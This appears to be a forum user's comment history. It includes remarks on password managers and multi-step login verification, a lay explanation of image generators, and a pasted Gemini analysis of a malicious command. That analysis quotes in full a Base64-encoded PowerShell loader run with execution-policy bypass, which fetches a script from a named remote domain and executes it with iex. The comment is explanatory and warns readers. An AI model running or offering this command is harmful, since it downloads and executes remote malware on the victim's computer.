• 3 Posts
  • 62 Comments
Joined 3 years ago
cake
Cake day: June 22nd, 2023

help-circle


  • Fully agree, it’s almost security theater.

    They need to offer a way for use with a password manager, maybe a slightly hidden option or detecting a really long password to stop all the extra bits.

    I forgot what the service was but it will have my user and pass, prompt the email verify, and then it will ask for the token generated in an Auth app.

    At a certain point the proper user probably can’t get in





  • One of the moments that Ai can be good. I asked googled gemni

    This command is highly malicious and is designed to execute a script downloaded from a remote server. Here’s a breakdown of what each part does:

    • conhost cmd /c: This part starts a new command prompt window (cmd) and then immediately executes the following command (/c) within it. conhost is a legitimate Windows process, but here it’s being used as a wrapper.
    • powershell /ep bypass /e JABzAGkAdABlACAAPQAgAEkAbgB2AG8AawBlAC0AUgBlAHMAdABNAGUAdABoAG8AZAAgACcAaAB0AHQAcwA6AC8ALwBtAGEAcwB0AHIAYQB3AC4AdABvAHAA LwBtAGUvAGQAYQB5ACcAOwAgAGkARQB4ACAAJABzAGkAdABlAA==: This is the core malicious part.
      • powershell: Invokes the PowerShell interpreter.
      • /ep bypass: This is crucial. /ep stands for “execution policy.” bypass tells PowerShell to bypass its execution policy, meaning it will run any script regardless of the local security settings that might otherwise prevent untrusted scripts from running. This is a common tactic for malware.
      • /e JABzAGkAdABlACAAPQAgAEkAbgB2AG8AawBlAC0AUgBlAHMAdABNAGUAdABoAG8AZAAgACcAaAB0AHQAcwA6AC8ALwBtAGEAcwB0AHIAYQBhAC4AdABvAHAA LwBtAGUvAGQAYQB5ACcAOwAgAGkARQB4ACAAJABzAGkAdABlAA==: The /e switch indicates that the following string is an encoded command. The string JABzAGkAdABlACAAPQAgAEkAbgB2AG8AawBlAC0AUgBlAHMAdABNAGUAdABoAG8AZAAgACcAaAB0AHQAcwA6AC8ALwBtAGEAcwB0AHIAYQB3AC4AdABvAHAA LwBtAGUvAGQAYQB5ACcAOwAgAGkARQB4ACAAJABzAGkAdABlAA== is a Base64 encoded string. Let’s decode the Base64 string to see the actual PowerShell command: Decoded PowerShell command: $site = Invoke-RestMethod ‘https: //mastraw.top/me/day’; iex $site Now we can fully understand the malicious intent:
    • $site = Invoke-RestMethod ‘# https: //mastraw.top/me/day’: This command uses Invoke-RestMethod to download content from the URL ‘https://mastraw/. top/me/day’ . This URL is likely hosting a malicious PowerShell script or some other form of executable code.
    • ; iex $site: The semicolon acts as a command separator. iex is an alias for Invoke-Expression. This command takes the content downloaded from ‘https://mastraw.top/. /me/day’ (which is stored in the $site variable) and executes it directly as a PowerShell command. In summary, this command is designed to:
    • Bypass PowerShell’s security restrictions.
    • Download a script from a specific remote website ‘(https. ://mastraw.top/me/day)’ .
    • Immediately execute that downloaded script on the victim’s computer. The content of the script downloaded from’ https :// mastraw.top/me/day’ is unknown without accessing that URL, but given the nature of this command, it’s almost certainly malicious. It could be anything from a ransomware dropper, a keylogger, a remote access trojan (RAT), or a cryptocurrency miner. If you encountered this on a computer, it is highly compromised and should be immediately isolated from the network and professionally cleaned or reimaged.

    Edit:added back tick to urls













  • It kinda understands context.

    An image generator makes an image of static similar to like a TV does with bad signal. The Ai looks atthe static and sees shapes in it. The prompt influences what it’s trying to “see”. It starts filling in the static to a full image, it does this in steps, more steps generally means a better quality image.

    Also to say a LLM is a Large Language Model and is different from an image generator, though the proccess for them is very similar.